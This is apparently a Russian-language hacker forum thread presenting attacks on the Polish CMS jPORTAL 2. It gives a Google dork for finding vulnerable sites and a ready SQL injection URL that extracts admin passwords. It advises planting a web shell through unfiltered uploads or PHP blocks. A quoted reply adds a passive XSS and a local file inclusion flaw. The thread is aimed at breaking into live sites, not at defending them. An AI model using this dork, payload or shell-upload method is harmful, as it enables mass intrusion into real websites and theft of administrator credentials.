Популярная в Польше CMS.
Я не стану описывать все скули что были найдены в этой CMS, некоторые есть и в паблике. Эта уязвимость наиболее "удобна" и нигде не засвечена.
Уязвимо большинство сайтов, все версии. На официальном сайте просто защита от "хакеров", но и он уязвим.

Уязвимый код:


function topic_name($a)
{
global $topic_tbl;
$query = "SELECT * FROM $topic_tbl WHERE id=$a";
$result = mysql_query($query);
$r = mysql_fetch_array($result);
return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';
}


Дорк:intext:"jPORTAL 2" & inurl:"articles.php?topic="

articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/

В более старых версиях jp_admins. Также есть таблица users или jp_users.

Шелл заливать двумя способами: Аплоад файлов без фильтра или блоки, позволяющие вставлять php код.

ещё одна https://forum.antichat.ru/thread53101.html
ЗЫ один минус: на многих стоят детекторы атаки sql-inj

_http://milw0rm.com/exploits/4614

Passive XSS in "theme/Default/index.php" :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title><? echo $site_name ?> - <? echo $site_title ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<? echo $head_info ?>
<? echo $meta_info ?>
<link rel="stylesheet" href="<? echo "theme/$theme/"; ?>style.css" type="text/css">


Если registers_global=On, то через переменные $site_name, $site_title, $head_info, $meta_info
и $theme можно передать XSS-вектор.
Аналогичные уязвимости в файлах theme/Default/normal.php и theme/Default/no_menu.php.

Local File Inclusion in "module.php":

function module($op) {
global $error;

if(file_exists('module/'.$op.'.aim.php')) {
include('module/'.$op.'.aim.php'); /* (2) */
} elseif($op=='') {
header("Location: index.php");
exit;
} else {
$error = 'e1';
}
}
[...]
module($op); /* (1) */

Переменная $op передается в функцию module() [1] через GET,
затем в include() [2] $op используется как есть.

(с)Daath

Shadow']Passive XSS in "theme/Default/index.php" :
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title><? echo $site_name ?> - <? echo $site_title ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<? echo $head_info ?>
<? echo $meta_info ?>
<link rel="stylesheet" href="<? echo "theme/$theme/"; ?>style.css" type="text/css">


Если registers_global=On, то через переменные $site_name, $site_title, $head_info, $meta_info
и $theme можно передать XSS-вектор.
Аналогичные уязвимости в файлах theme/Default/normal.php и theme/Default/no_menu.php.

Local File Inclusion in "module.php":

function module($op) {
global $error;

if(file_exists('module/'.$op.'.aim.php')) {
include('module/'.$op.'.aim.php'); /* (2) */
} elseif($op=='') {
header("Location: index.php");
exit;
} else {
$error = 'e1';
}
}
[...]
module($op); /* (1) */

Переменная $op передается в функцию module() [1] через GET,
затем в include() [2] $op используется как есть.

(с)Daath
Насчет локал инклуда могу сказать точно - большинство сайтов от него закрыты. Я не стал его постить поэтому. Про ксс тоже знал, правда активную. Кое где ее неумело поприменяли=) Но рыть ее не стал.